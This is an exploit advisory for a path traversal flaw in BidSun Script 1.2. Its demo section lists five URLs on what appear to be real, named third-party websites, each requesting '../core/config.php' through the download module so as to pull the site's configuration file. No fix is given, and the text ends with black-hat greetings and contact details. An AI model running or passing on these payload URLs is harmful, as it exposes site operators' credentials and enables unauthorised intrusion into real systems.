/***********************************************************************************
** Exploit Title:  BidSun Script Local File Download Vulnerability
**
** Exploit Author:  FullSecurity.org
**
** Discovered By:  Milad Hacking
**
** Vendor Homepage : http://bidsun.ir/
**
** Demo Script Link: http://bidsun.ir/demo/
**
** Version : 1.2
**
** Date: 2016-01-13
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :


http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php

http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php

http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php

http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php

http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - Mohamad Ghasemi
- irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t -
s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker
<3
***********************************************************************************
https://telegram.me/thehacking
http://FullSecurity.org
milad.hacking.blackhat@Gmail.com

***********************************************************************************